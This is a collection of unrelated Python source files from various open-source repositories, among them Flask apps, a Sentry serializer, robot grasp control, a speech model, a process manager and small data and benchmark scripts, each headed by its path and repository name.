parser.add_argument('--batch_size',type=int)
parser.add_argument('--model_path', type= str)
args = parser.parse_args()
dim = {'spec':[161,1], 'conv':[1312,1], 'rnn_0': [1024,1], 'rnn_1': [1024,1], 'rnn_2': [1024, 1], 'rnn_3': [1024, 1], 'rnn_4': [1024,1]}
if __name__ == '__main__':
torch.manual_seed(0)
eval_phones(args.test_path, args.rep_type, args.batch_size, 1, dim[args.rep_type][0], dim[args.rep_type][1],args.model_path)
| 3,519 |
zarr-string-table/to_zarr.py
|
oeway/spatial-omics-hackathon-2021
| 0 |
2172747
|
import pandas as pd
import numpy as np
import zarr
from numcodecs import GZip
def fixed_length():
tab = pd.read_csv("../spots_reduced.csv")
col = np.array([str(v) for v in tab["target"].values])
f = zarr.open("table.zarr")
f.create_dataset("fixed-length", data=col, chunks=(2048,), compressor=GZip())
def float_reference():
data = np.random.rand(2048).astype("float32")
f = zarr.open("table.zarr")
f.create_dataset("float", data=data, chunks=(512,), compressor=GZip())
float_reference()
| 525 |
src/sentry/api/serializers/models/commit.py
|
seukjung/sentry-custom
| 0 |
2173139
|
from __future__ import absolute_import
import six
from sentry.api.serializers import Serializer, register, serialize
from sentry.models import Commit, Repository
from sentry.api.serializers.models.release import get_users_for_commits
@register(Commit)
class CommitSerializer(Serializer):
def get_attrs(self, item_list, user):
author_objs = get_users_for_commits(item_list)
repositories = list(Repository.objects.filter(id__in=[c.repository_id for c in item_list]))
repositories = serialize(repositories)
repository_objs = {}
for repository in repositories:
repository_objs[repository['id']] = repository
result = {}
for item in item_list:
result[item] = {
'repository': repository_objs.get(six.text_type(item.repository_id), {}),
'user': author_objs.get(item.author_id, {})
}
return result
def serialize(self, obj, attrs, user):
d = {
'id': obj.key,
'message': obj.message,
'dateCreated': obj.date_added,
'repository': attrs.get('repository', {}),
'author': attrs.get('user', {})
}
return d
| 1,223 |
scripts/process_wrangler.py
|
hackcasual/ocupus
| 0 |
2171734
|
import shlex
import subprocess
import zmq
import time
from multiprocessing import Process, Value, Queue
class ManagedProcess:
processes = []
def __init__(self, commandLine, category, name, shouldRestart):
self.commandLine = commandLine
self.category = category
self.name = name
self.shouldRestart = shouldRestart
self.shutdownFlag = Value('B', 0)
ManagedProcess.processes.append(self)
@staticmethod
def system_shutdown():
for p in ManagedProcess.processes:
p.shutdownFlag.value = 1
leftAlive = False
for p in ManagedProcess.processes:
try:
if p.managedProcess.is_alive():
leftAlive = True
except:
pass
if not leftAlive:
return
time.sleep(1.0)
for p in ManagedProcess.processes:
try:
p.managedProcess.terminate()
except:
pass
def start(self):
self.managedProcess = Process(target=self._run, args=(self.shutdownFlag,))
self.managedProcess.start()
def stop(self):
self.shutdownFlag.value = 1
self.managedProcess.join()
def _run(self, shutdown):
context = zmq.Context()
processControl = context.socket(zmq.SUB)
processControl.connect ("tcp://localhost:5554")
processControl.setsockopt(zmq.SUBSCRIBE, "process_control:%s:%s" % (self.category, self.name))
context = zmq.Context()
logger = context.socket(zmq.REQ)
logger.connect ("tcp://localhost:5550")
args = shlex.split(self.commandLine)
proc = subprocess.Popen(args)
while not shutdown.value:
events = processControl.poll(timeout=100)
if events != 0:
pass
retcode = proc.poll()
if retcode is None:
continue
logger.send_json({"type":"process_status", "data":{
"event": "exit",
"retcode": retcode,
"name": self.name,
"category": self.category,
"commandLine": self.commandLine
}})
logger.recv()
if self.shouldRestart:
time.sleep(0.1)
print("Restarting process %s:%s" % (self.category, self.name))
proc = subprocess.Popen(args)
logger.send_json({"type":"process_status", "data":{
"event": "restarting",
"name": self.name,
"category": self.category,
"commandLine": self.commandLine
}})
logger.recv()
else:
shutdown.value = 1
self._stop_child(proc)
def _stop_child(self, proc):
if proc.poll() is None:
proc.terminate()
for i in range(10):
if proc.poll() is not None:
return True
time.sleep(0.100)
print("Needed to kill the process")
proc.kill()
return False
return True
| 3,187 |
bench_bin.py
|
jpollack/statsite
| 629 |
2173103
|
import socket
import time
import random
import struct
NUM = 1024 * 1024
KEYS = ["test", "foobar", "zipzap"]
VALS = [32, 100, 82, 101, 5, 6, 42, 73]
BINARY_HEADER = struct.Struct("<BBHd")
BINARY_SET_HEADER = struct.Struct("<BBHH")
BIN_TYPES = {"kv": 1, "c": 2, "ms": 3, "set": 4}
def format(key, type, val):
"Formats a binary message for statsite"
key = str(key)
key_len = len(key) + 1
type_num = BIN_TYPES[type]
header = BINARY_HEADER.pack(170, type_num, key_len, float(val))
mesg = header + key + "\0"
return mesg
def format_set(key, val):
"Formats a binary set message for statsite"
key = str(key)
key_len = len(key) + 1
val = str(val)
val_len = len(val) + 1
type_num = BIN_TYPES["set"]
header = BINARY_SET_HEADER.pack(170, type_num, key_len, val_len)
mesg = "".join([header, key, "\0", val, "\0"])
return mesg
METS = []
for x in xrange(NUM):
key = random.choice(KEYS)
val = str(x) #random.choice(VALS)
METS.append(format_set(key, val))
s = socket.socket()
s.connect(("localhost", 8125))
start = time.time()
total = 0
while True:
current = 0
while current < len(METS):
msg = "".join(METS[current:current + 1024])
current += 1024
total += 1024
s.sendall(msg)
diff = time.time() - start
ops_s = total / diff
print "%0.2f sec\t - %.0f ops/sec" % (diff, ops_s)
| 1,400 |
coral_test.py
|
alsprogrammer/aaeon_up_board_setup
| 0 |
2171730
|
import numpy as np
import tflite_runtime.interpreter as tflite
interpreter = tflite.Interpreter('converted_model.tflite', experimental_delegates=[tflite.load_delegate('libedgetpu.so.1')])
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
output_details = interpreter.get_output_details()
data = [1, 1, 1]
input_data = np.float32([data])
interpreter.set_tensor(input_details[0]['index'], input_data)
interpreter.invoke()
print(interpreter.get_tensor(output_details[0]['index']).tolist()[0])
| 524 |
assemblyline/assemblyline/al/install/stages/install_70_signature_statistics.py
|
dendisuhubdy/grokmachine
| 46 |
2172375
|
from assemblyline.al.install import SiteInstaller
def install(alsi=None):
alsi = alsi or SiteInstaller()
alsi.milestone("Install signature statistics...")
alsi.sudo_install_file('assemblyline/al/install/etc/cron/al-signatures',
'/etc/cron.d/al-signatures')
alsi.milestone("Completed installation of signature statistics.")
if __name__ == '__main__':
install()
| 412 |
pynitrokey/nethsm/client/models/__init__.py
|
fayrlight/pynitrokey
| 0 |
2169509
|
# flake8: noqa
# import all models into this package
# if you have many models here with many references from one model to another this may
# raise a RecursionError
# to avoid this, import only the models that you directly need like:
# from from pynitrokey.nethsm.client.model.pet import Pet
# or import this package, but before doing it, use:
# import sys
# sys.setrecursionlimit(n)
from pynitrokey.nethsm.client.model.backup_passphrase_config import BackupPassphraseConfig
from pynitrokey.nethsm.client.model.base64 import Base64
from pynitrokey.nethsm.client.model.decrypt_data import DecryptData
from pynitrokey.nethsm.client.model.decrypt_mode import DecryptMode
from pynitrokey.nethsm.client.model.decrypt_request_data import DecryptRequestData
from pynitrokey.nethsm.client.model.distinguished_name import DistinguishedName
from pynitrokey.nethsm.client.model.health_state_data import HealthStateData
from pynitrokey.nethsm.client.model.id import ID
from pynitrokey.nethsm.client.model.info_data import InfoData
from pynitrokey.nethsm.client.model.key_algorithm import KeyAlgorithm
from pynitrokey.nethsm.client.model.key_generate_request_data import KeyGenerateRequestData
from pynitrokey.nethsm.client.model.key_item import KeyItem
from pynitrokey.nethsm.client.model.key_list import KeyList
from pynitrokey.nethsm.client.model.key_mechanism import KeyMechanism
from pynitrokey.nethsm.client.model.key_mechanisms import KeyMechanisms
from pynitrokey.nethsm.client.model.key_private_data import KeyPrivateData
from pynitrokey.nethsm.client.model.key_public_data import KeyPublicData
from pynitrokey.nethsm.client.model.log_level import LogLevel
from pynitrokey.nethsm.client.model.logging_config import LoggingConfig
from pynitrokey.nethsm.client.model.network_config import NetworkConfig
from pynitrokey.nethsm.client.model.passphrase import Passphrase
from pynitrokey.nethsm.client.model.private_key import PrivateKey
from pynitrokey.nethsm.client.model.provision_request_data import ProvisionRequestData
from pynitrokey.nethsm.client.model.public_key import PublicKey
from pynitrokey.nethsm.client.model.random_data import RandomData
from pynitrokey.nethsm.client.model.random_request_data import RandomRequestData
from pynitrokey.nethsm.client.model.sign_data import SignData
from pynitrokey.nethsm.client.model.sign_mode import SignMode
from pynitrokey.nethsm.client.model.sign_request_data import SignRequestData
from pynitrokey.nethsm.client.model.switch import Switch
from pynitrokey.nethsm.client.model.system_info import SystemInfo
from pynitrokey.nethsm.client.model.system_state import SystemState
from pynitrokey.nethsm.client.model.system_update_data import SystemUpdateData
from pynitrokey.nethsm.client.model.time_config import TimeConfig
from pynitrokey.nethsm.client.model.unattended_boot_config import UnattendedBootConfig
from pynitrokey.nethsm.client.model.unlock_passphrase_config import UnlockPassphraseConfig
from pynitrokey.nethsm.client.model.unlock_request_data import UnlockRequestData
from pynitrokey.nethsm.client.model.user_data import UserData
from pynitrokey.nethsm.client.model.user_item import UserItem
from pynitrokey.nethsm.client.model.user_list import UserList
from pynitrokey.nethsm.client.model.user_passphrase_post_data import UserPassphrasePostData
from pynitrokey.nethsm.client.model.user_post_data import UserPostData
from pynitrokey.nethsm.client.model.user_role import UserRole
| 3,435 |
python/src/simulation.py
|
corinnaj/mysterious-murder
| 9 |
2172540
|
import random
from .agent import RandomAgent
from .evaluator import Evaluator
class Simulation:
def __init__(self, evaluator: Evaluator, agent=RandomAgent(), log=False):
self.evaluator = evaluator
self.agent = agent
self.log = log
def copy(self):
return Simulation(self.evaluator.copy())
def run(self, interactive=False, max_steps=100):
if interactive:
while True:
options = self.evaluator.step()
if len(options) < 1:
print('No options, exiting')
break
print('0: exit')
for i in range(len(options)):
print('{}: {}'.format(str(i + 1), str(options[i])))
number = int(input('Enter number: '))
if number == 0:
break
else:
options[number - 1].apply(self.evaluator)
else:
for _ in range(max_steps):
if not self.step():
return
def get_score_for_actor(self, actor):
# better look up the proper actor instance again, we might have
# diverged during copying
a = next(a for a in self.evaluator.actors if a == actor)
return a.calculate_score()
def count_alive_actors(self):
count = 0
for a in self.evaluator.actors:
if self.evaluator.state.contains('alive', [a]):
count += 1
return count
def check_stop(self, option):
return False
def get_actions_for_actor(self, actor):
options = self.evaluator.step()
return [option for option in options
if option.actors[0] == actor]
def whose_turn(self):
return random.choice(self.evaluator.actors)
def take_action(self, actor, rule_instance):
rule_instance.apply(self.evaluator, record=False, rewards=True)
def step(self):
next_actor = self.whose_turn()
option = self.agent.choose_action(next_actor, self)
# next_actor.update_scales(option.rule)
option.apply(self.evaluator, record=True, rewards=True)
self.random_witness(option)
if self.log:
print(option.story_print())
self.print_reward_state()
# self.print_causality(option)
# print(option.actors[0].relationship_to(option.actors[1],
# self.evaluator.state))
return not self.check_stop(option)
def random_witness(self, rule_instance):
if random.random() <= rule_instance.rule.witness_probability:
witness = random.choice([a for a in self.evaluator.actors
if a not in rule_instance.actors])
print("Witness! " + str(rule_instance) + " " + str(witness))
witness.witness(rule_instance)
def print_graph(self, view=True, show_all=False):
return self.evaluator.print_graph(view=view, show_all=show_all)
def print_causality(self, root):
self.evaluator.traverse_tree(root,
lambda rule: print(rule.story_print()))
def print_reward_state(self):
print('--------------------')
print(' \tsocial\tfulfilm\tsanity\tSCORE')
for c in self.evaluator.actors:
c.print_reward_state()
print('--------------------')
print()
| 3,436 |
exercise/admin.py
|
jkimbo/phishtray
| 0 |
2172878
|
from django.contrib import admin
from django import forms
from django.contrib import admin
from .models import Exercise, ExerciseKey, ExerciseEmail, ExerciseAttachment, ExerciseEmailReply, ExerciseURL, ExerciseWebPages
class ExerciseAdminForm(forms.ModelForm):
class Meta:
model = Exercise
exclude = []
readonly_fields = ['link',]
class ExerciseAdmin(admin.ModelAdmin):
form = ExerciseAdminForm
list_display = ('id', 'title', 'link', 'description', 'length_minutes')
list_filter = ['id']
admin.site.register(Exercise, ExerciseAdmin)
admin.site.register(ExerciseKey)
admin.site.register(ExerciseEmail)
admin.site.register(ExerciseEmailReply)
admin.site.register(ExerciseAttachment)
admin.site.register(ExerciseURL)
admin.site.register(ExerciseWebPages)
| 797 |
app/models.py
|
Zoctan/flask-api-seed
| 0 |
2172982
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from flask import current_app
from itsdangerous import (
TimedJSONWebSignatureSerializer as Serializer, BadSignature, SignatureExpired)
from passlib.apps import custom_app_context as pwd_context
from app import db
class Permission:
COMMENT = 0x02
WRITE_ARTICLES = 0x04
MODERATE_COMMENTS = 0x08
ADMIN = 0x80
class UserRole(db.Model):
__tablename__ = 'role'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(64), unique=True)
default = db.Column(db.Boolean, default=False, index=True)
permissions = db.Column(db.Integer)
user = db.relationship('User', backref='UserRole', lazy='dynamic', cascade='all, delete-orphan')
@staticmethod
def insert_roles():
roles = {
'user': (Permission.COMMENT |
Permission.WRITE_ARTICLES, True),
'admin': (0xff, False)
}
for r in roles:
role = UserRole.query.filter_by(name=r).first()
if role is None:
role = UserRole(name=r)
role.permissions = roles[r][0]
role.default = roles[r][1]
db.session.add(role)
db.session.commit()
def __repr__(self):
return '<UserRole(nanme={}, permissions={})>'.format(self.name, self.permissions)
class User(db.Model):
__tablename__ = 'user'
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.Unicode(32, collation='utf8_bin'), nullable=False, unique=True, index=True)
password_hash = db.Column(db.Unicode(256, collation='utf8_bin'), nullable=False)
email = db.Column(db.Unicode(20, collation='utf8_bin'))
role = db.relationship('UserRole', backref='User', uselist=False, lazy='select')
def __repr__(self):
return '<User(username={})>'.format(self.username)
def __init__(self, **kwargs):
super(User, self).__init__(**kwargs)
if self.role_id is None:
if self.username == 'admin':
role = UserRole.query.filter_by(permissions=0xff).first()
else:
role = UserRole.query.filter_by(default=True).first()
self.role_id = role.id
def operation(self, permissions):
return self.role_id is not None and (self.role.permissions & permissions) == permissions
@property
def password(self):
raise AttributeError('password is not a readable attribute')
@password.setter
def password(self, password):
self.password_hash = pwd_context.hash(password)
def verify_password(self, password):
return pwd_context.verify(password, self.password_hash)
def generate_auth_token(self, expiration=3600):
s = Serializer(current_app.config['SECRET_KEY'], expires_in=expiration)
return s.dumps({'id': self.id})
@staticmethod
def verify_auth_token(token):
s = Serializer(current_app.config['SECRET_KEY'])
try:
data = s.loads(token)
except SignatureExpired:
return None # valid token, but expired
except BadSignature:
return None # invalid token
user = User.query.get(data['id'])
return user
def to_json(self):
json = {
'id': self.id,
'username': self.username,
'email': self.email
}
return json
class AnonymousUser(User):
def operation(self, permissions):
return False
| 3,484 |
common/ftp/models/user/restp.py
|
ithollie/PayBits
| 0 |
2171030
|
from common.database import Database
from models.passrest.mail.sendemail import Mail
from models import constants as UserConstants
class Restp(object):
def __init__(self,email):
self.email = email
self.netmail = self.sendmail(self.email,self.json()['url'],self.json()['subject'])
@staticmethod
def checkmail(email):
data = Database.find_one(UserConstants.COLLECTION,{"email":email})
if data is not None:
return data
else:
return None;
@staticmethod
def checkmliame(email):
data = Database.find(UserConstants.COLLECTION,{})
for datas in data:
dat = datas["email"]
if dat == email:
return email
@staticmethod
def Update(emailnow,emailupdated):
if emailnow is not None:
Database.updates(UserConstants.COLLECTION,{"email":emailnow},{"$set": {"email":emailupdated}} )
@classmethod
def check_mail(self,email):
namail = self.checkmliame(email)
data = Database.find_one(UserConstants.COLLECTION,{"email":namail})
if data is not None:
return data
else:
return False
def Valid(self):
cridential={"email":self.check_mail(self.email)['email'],"id":self.check_mail(self.email)['_id']}
return cridential
@staticmethod
def sendmail(email,url,subject):
mail = Mail(email,url,subject)
if mail is not None:
mail.send()
def json(self):
return {"url":"http://127.0.0.1:8000/change_system_password/change_users_password/"+self.Valid()['email']+"/"+self.Valid()['id'],"subject":"please rest password"}
| 1,477 |
src/models/private/wavenet.py
|
trungd/speech-recognition
| 1 |
2171109
|
# Compatibility imports
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import time, os
from .base import BaseModel
import tensorflow as tf
from six.moves import xrange as range
num_units = 320 # Number of units in the LSTM cell
# Accounting the 0th indice + space + blank label = 28 characters
# Hyper-parameters
num_epochs = 10000
num_hidden = 50
num_layers = 3
tf.logging.set_verbosity(tf.logging.INFO)
tf.logging.info('test')
# val_inputs, val_seq_len, val_targets = audio_processor.next_train_batch(1, 1)
class WavenetModel(BaseModel):
def _build_graph(self):
# generate a SparseTensor required by ctc_loss op.
indices = tf.where(tf.not_equal(self.target_labels, tf.constant(-1, tf.int32)))
values = tf.gather_nd(self.target_labels, indices)
shape = tf.shape(self.target_labels, out_type=tf.int64)
self.targets = tf.SparseTensor(indices, values, shape)
# Defining the cell
# cells = [tf.contrib.rnn.LSTMCell(num_units) for _ in range(num_layers)]
# stack = tf.contrib.rnn.MultiRNNCell(cells)
# The second output is the last state and we will no use that
# outputs, _ = tf.nn.dynamic_rnn(stack, self.inputs, self.input_seq_len, dtype=tf.float32)
cells_fw = [tf.contrib.rnn.LSTMCell(num_units) for _ in range(num_layers)]
cells_bw = [tf.contrib.rnn.LSTMCell(num_units) for _ in range(num_layers)]
outputs, _, _ = tf.contrib.rnn.stack_bidirectional_dynamic_rnn(cells_fw,
cells_bw, self.inputs,
sequence_length=self.input_seq_len,
dtype=tf.float32)
# Reshaping to apply the same weights over the timesteps
# outputs = tf.reshape(outputs, [-1, num_hidden])
logits = tf.layers.dense(outputs, self.hparams.num_classes)
# Reshaping back to the original shape
# logits = tf.reshape(logits, [hparams.batch_size, -1, hparams.num_classes])
# Time major
logits = tf.transpose(logits, (1, 0, 2))
self.logits = logits
loss = tf.nn.ctc_loss(self.targets, logits, self.input_seq_len, ignore_longer_outputs_than_inputs=True)
self.loss = tf.reduce_mean(loss)
self.decoded, log_prob = tf.nn.ctc_greedy_decoder(logits, self.input_seq_len)
# self.decoded, log_prob = tf.nn.ctc_beam_search_decoder(logits, self.input_seq_len)
self.dense_decoded = tf.sparse_tensor_to_dense(self.decoded[0], default_value=-1)
# label error rate
self.ler = tf.reduce_mean(tf.edit_distance(tf.cast(self.decoded[0], tf.int32),
self.targets))
def train(self, sess):
# inputs, targets = sess.run([self.inputs, self.targets])
batch_lost, _, self.summary, _ler, dense_decoded, \
inputs, labels, inputs_len, labels_len, logits = \
sess.run([
self.loss,
self.update,
self.train_summary,
self.ler,
self.dense_decoded,
self.inputs, self.target_labels, self.input_seq_len, self.target_seq_len, self.logits
])
return batch_lost, _ler
def eval(self, sess):
target_labels, cost, ler, decoded = \
sess.run([
self.target_labels,
self.cost,
self.ler,
self.dense_decoded
])
return target_labels, cost, ler, decoded
| 3,704 |
contest/abc143/C.py
|
mola1129/atcoder
| 0 |
2171947
|
n = int(input())
s = input()
ans = 0
for i in range(1, n):
if s[i] != s[i - 1]:
ans += 1
print(ans + 1)
| 116 |
scripts/panda_grasp.py
|
runeg96/vgn
| 92 |
2172841
|
#!/usr/bin/env python
"""
Open-loop grasp execution using a Panda arm and wrist-mounted RealSense camera.
"""
import argparse
from pathlib import Path
import cv_bridge
import franka_msgs.msg
import geometry_msgs.msg
import numpy as np
import rospy
import sensor_msgs.msg
from vgn import vis
from vgn.experiments.clutter_removal import State
from vgn.detection import VGN
from vgn.perception import *
from vgn.utils import ros_utils
from vgn.utils.transform import Rotation, Transform
from vgn.utils.panda_control import PandaCommander
# tag lies on the table in the center of the workspace
T_base_tag = Transform(Rotation.identity(), [0.42, 0.02, 0.21])
round_id = 0
class PandaGraspController(object):
def __init__(self, args):
self.robot_error = False
self.base_frame_id = rospy.get_param("~base_frame_id")
self.tool0_frame_id = rospy.get_param("~tool0_frame_id")
self.T_tool0_tcp = Transform.from_dict(rospy.get_param("~T_tool0_tcp")) # TODO
self.T_tcp_tool0 = self.T_tool0_tcp.inverse()
self.finger_depth = rospy.get_param("~finger_depth")
self.size = 6.0 * self.finger_depth
self.scan_joints = rospy.get_param("~scan_joints")
self.setup_panda_control()
self.tf_tree = ros_utils.TransformTree()
self.define_workspace()
self.create_planning_scene()
self.tsdf_server = TSDFServer()
self.plan_grasps = VGN(args.model, rviz=True)
rospy.loginfo("Ready to take action")
def setup_panda_control(self):
rospy.Subscriber(
"/franka_state_controller/franka_states",
franka_msgs.msg.FrankaState,
self.robot_state_cb,
queue_size=1,
)
rospy.Subscriber(
"/joint_states", sensor_msgs.msg.JointState, self.joints_cb, queue_size=1
)
self.pc = PandaCommander()
self.pc.move_group.set_end_effector_link(self.tool0_frame_id)
def define_workspace(self):
z_offset = -0.06
t_tag_task = np.r_[[-0.5 * self.size, -0.5 * self.size, z_offset]]
T_tag_task = Transform(Rotation.identity(), t_tag_task)
self.T_base_task = T_base_tag * T_tag_task
self.tf_tree.broadcast_static(self.T_base_task, self.base_frame_id, "task")
rospy.sleep(1.0) # wait for the TF to be broadcasted
def create_planning_scene(self):
# collision box for table
msg = geometry_msgs.msg.PoseStamped()
msg.header.frame_id = self.base_frame_id
msg.pose = ros_utils.to_pose_msg(T_base_tag)
msg.pose.position.z -= 0.01
self.pc.scene.add_box("table", msg, size=(0.6, 0.6, 0.02))
rospy.sleep(1.0) # wait for the scene to be updated
def robot_state_cb(self, msg):
detected_error = False
if np.any(msg.cartesian_collision):
detected_error = True
for s in franka_msgs.msg.Errors.__slots__:
if getattr(msg.current_errors, s):
detected_error = True
if not self.robot_error and detected_error:
self.robot_error = True
rospy.logwarn("Detected robot error")
def joints_cb(self, msg):
self.gripper_width = msg.position[7] + msg.position[8]
def recover_robot(self):
self.pc.recover()
self.robot_error = False
rospy.loginfo("Recovered from robot error")
def run(self):
vis.clear()
vis.draw_workspace(self.size)
self.pc.move_gripper(0.08)
self.pc.home()
tsdf, pc = self.acquire_tsdf()
vis.draw_tsdf(tsdf.get_grid().squeeze(), tsdf.voxel_size)
vis.draw_points(np.asarray(pc.points))
rospy.loginfo("Reconstructed scene")
state = State(tsdf, pc)
grasps, scores, planning_time = self.plan_grasps(state)
vis.draw_grasps(grasps, scores, self.finger_depth)
rospy.loginfo("Planned grasps")
if len(grasps) == 0:
rospy.loginfo("No grasps detected")
return
grasp, score = self.select_grasp(grasps, scores)
vis.draw_grasp(grasp, score, self.finger_depth)
rospy.loginfo("Selected grasp")
self.pc.home()
label = self.execute_grasp(grasp)
rospy.loginfo("Grasp execution")
if self.robot_error:
self.recover_robot()
return
if label:
self.drop()
self.pc.home()
def acquire_tsdf(self):
self.pc.goto_joints(self.scan_joints[0])
self.tsdf_server.reset()
self.tsdf_server.integrate = True
for joint_target in self.scan_joints[1:]:
self.pc.goto_joints(joint_target)
self.tsdf_server.integrate = False
tsdf = self.tsdf_server.low_res_tsdf
pc = self.tsdf_server.high_res_tsdf.get_cloud()
return tsdf, pc
def select_grasp(self, grasps, scores):
# select the highest grasp
heights = np.empty(len(grasps))
for i, grasp in enumerate(grasps):
heights[i] = grasp.pose.translation[2]
idx = np.argmax(heights)
grasp, score = grasps[idx], scores[idx]
# make sure camera is pointing forward
rot = grasp.pose.rotation
axis = rot.as_matrix()[:, 0]
if axis[0] < 0:
grasp.pose.rotation = rot * Rotation.from_euler("z", np.pi)
return grasp, score
def execute_grasp(self, grasp):
T_task_grasp = grasp.pose
T_base_grasp = self.T_base_task * T_task_grasp
T_grasp_pregrasp = Transform(Rotation.identity(), [0.0, 0.0, -0.05])
T_grasp_retreat = Transform(Rotation.identity(), [0.0, 0.0, -0.05])
T_base_pregrasp = T_base_grasp * T_grasp_pregrasp
T_base_retreat = T_base_grasp * T_grasp_retreat
self.pc.goto_pose(T_base_pregrasp * self.T_tcp_tool0, velocity_scaling=0.2)
self.approach_grasp(T_base_grasp)
if self.robot_error:
return False
self.pc.grasp(width=0.0, force=20.0)
if self.robot_error:
return False
self.pc.goto_pose(T_base_retreat * self.T_tcp_tool0)
# lift hand
T_retreat_lift_base = Transform(Rotation.identity(), [0.0, 0.0, 0.1])
T_base_lift = T_retreat_lift_base * T_base_retreat
self.pc.goto_pose(T_base_lift * self.T_tcp_tool0)
if self.gripper_width > 0.004:
return True
else:
return False
def approach_grasp(self, T_base_grasp):
self.pc.goto_pose(T_base_grasp * self.T_tcp_tool0)
def drop(self):
self.pc.goto_joints(
[0.678, 0.097, 0.237, -1.63, -0.031, 1.756, 0.931], 0.2, 0.2
)
self.pc.move_gripper(0.08)
class TSDFServer(object):
def __init__(self):
self.cam_frame_id = rospy.get_param("~cam/frame_id")
self.cam_topic_name = rospy.get_param("~cam/topic_name")
self.intrinsic = CameraIntrinsic.from_dict(rospy.get_param("~cam/intrinsic"))
self.size = 6.0 * rospy.get_param("~finger_depth")
self.cv_bridge = cv_bridge.CvBridge()
self.tf_tree = ros_utils.TransformTree()
self.integrate = False
rospy.Subscriber(self.cam_topic_name, sensor_msgs.msg.Image, self.sensor_cb)
def reset(self):
self.low_res_tsdf = TSDFVolume(self.size, 40)
self.high_res_tsdf = TSDFVolume(self.size, 120)
def sensor_cb(self, msg):
if not self.integrate:
return
img = self.cv_bridge.imgmsg_to_cv2(msg).astype(np.float32) * 0.001
T_cam_task = self.tf_tree.lookup(
self.cam_frame_id, "task", msg.header.stamp, rospy.Duration(0.1)
)
self.low_res_tsdf.integrate(img, self.intrinsic, T_cam_task)
self.high_res_tsdf.integrate(img, self.intrinsic, T_cam_task)
def main(args):
rospy.init_node("panda_grasp")
panda_grasp = PandaGraspController(args)
while True:
panda_grasp.run()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--model", type=Path, required=True)
args = parser.parse_args()
main(args)
| 8,126 |
tests/fruits_vows.py
|
wking/pyvows
| 34 |
2170492
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# pyvows testing engine
# https://github.com/heynemann/pyvows
# Licensed under the MIT license:
# http://www.opensource.org/licenses/mit-license
# Copyright (c) 2011 <NAME> <EMAIL>
from pyvows import Vows, expect
class Strawberry(object):
def __init__(self):
self.color = '#ff0000'
def isTasty(self):
return True
class PeeledBanana(object):
pass
class Banana(object):
def __init__(self):
self.color = '#fff333'
def peel(self):
return PeeledBanana()
@Vows.batch
class TheGoodThings(Vows.Context):
class AStrawberry(Vows.Context):
def topic(self):
return Strawberry()
def is_red(self, topic):
expect(topic.color).to_equal('#ff0000')
def and_tasty(self, topic):
expect(topic.isTasty()).to_be_true()
class ABanana(Vows.Context):
def topic(self):
return Banana()
class WhenPeeled(Vows.Context):
def topic(self, banana):
return banana.peel()
def returns_a_peeled_banana(self, topic):
expect(topic).to_be_instance_of(PeeledBanana)
| 1,192 |
testfiles/TTL test.py
|
Somnitec/thelastjobonearthbot
| 0 |
2172489
|
import win32com.client as wincl
speak = wincl.Dispatch("SAPI.SpVoice")
speak.Speak("This is the pc voice speaking")
| 116 |
main.py
|
jacksongolding/flask_portfolio
| 0 |
2171837
|
# hi my name is joe
# import "packages" from flask
from flask import Flask, request, render_template, url_for, redirect
from cruddy.app_crud import app_crud
from __init__ import app
from notey.app_notes import app_notes
from cruddy.model import Users, coolendar, model_printerr
from cruddy.query import users_all
from cruddy.eventroutes import events_all, app_events
app.register_blueprint(app_crud)
app.register_blueprint(app_notes)
app.register_blueprint(app_events)
# create a Flask instance
# connects default URL to render index.html
@app.route('/')
def index():
return render_template("index.html")
@app.route('/quiz/')
def quiz():
return render_template("quiz.html")
@app.route('/quiz3/')
def quiz3():
return render_template("quiz3.html")
@app.route('/quiz4/')
def quiz4():
return render_template("quiz4.html")
@app.route('/quizhome/')
def quizhome():
return render_template("quizhome.html")
@app.route('/Results/')
def Results():
return render_template("Results.html")
@app.route('/Squid/')
def Squid():
return render_template("Squid.html")
@app.route('/Building/')
def Building():
return render_template("Building.html")
@app.route('/overview/')
def overview():
return render_template("overview.html")
@app.route('/study/')
def study():
return render_template("study.html")
@app.route('/test/')
def test():
return render_template("test.html")
@app.route('/importantevents/')
def importantevents():
table = events_all()
return render_template("importantevents.html", table=table)
@app.route('/LUCAS', methods=['GET', 'POST'])
def LUCAS():
# submit button has been pushed
if request.form:
name = request.form.get("name")
if len(name) != 0: # input field has content
return render_template("Lucas.html", name=name)
# starting and empty input default
return render_template("Lucas.html", name="World")
@app.route('/RITHWIKH', methods=['GET', 'POST'])
def RITHWIKH():
# submit button has been pushed
if request.form:
name = request.form.get("name")
if len(name) != 0: # input field has content
return render_template("Rithwikh.html", name=name)
# starting and empty input default
return render_template("Rithwikh.html", name="World")
@app.route('/flashcards/')
def flashcards():
return render_template("flashcards.html")
# runs the application on the development server
if __name__ == "__main__":
app.run(debug=True)
| 2,503 |
tests/test_etherscan.py
|
VolumeFi/somm_airdrop
| 0 |
2170679
|
#!/usr/bin/env python
# import __init__
import os
import json
import pytest
from somm_airdrop import etherscan
from typing import Any, Dict, List, Union
from somm_airdrop.etherscan.token_info_connector import TokenInfoMap, TokenID
class TestTokenInfoConnector:
@pytest.fixture
def connector(self) -> etherscan.TokenInfoConnector:
return etherscan.TokenInfoConnector()
def test_single_query(self, connector: etherscan.TokenInfoConnector):
token_id = "0x0e3a2a1f2146d86a604adc220b4967a898d7fe07"
token_info_map: TokenInfoMap = connector.get_token_info(
token_ids=token_id)
assert isinstance(token_info_map, dict)
assert all([isinstance(token_id, TokenID) for token_id in token_info_map])
@pytest.fixture
def token_info_map(self, connector: etherscan.TokenInfoConnector
) -> TokenInfoMap:
token_id_wbtc: str = "0x2260fac5e5542a773aa44fbcfedf7c193bc2c599"
token_id_card: str = "0x0e3a2a1f2146d86a604adc220b4967a898d7fe07"
token_ids: List[str] = [token_id_wbtc, token_id_card]
token_info_map: TokenInfoMap = connector.get_token_info(
token_ids=token_ids)
assert isinstance(token_info_map, dict)
assert all([isinstance(token_id, TokenID) for token_id in token_info_map])
return token_info_map
def test_save_token_info_json(self,
connector: etherscan.TokenInfoConnector,
token_info_map: TokenInfoMap):
""""""
connector.save_token_info_json(token_info_map=token_info_map)
with open(os.path.join("data", "token_info.json"), mode='r') as f:
map_from_file: TokenInfoMap = json.load(f)
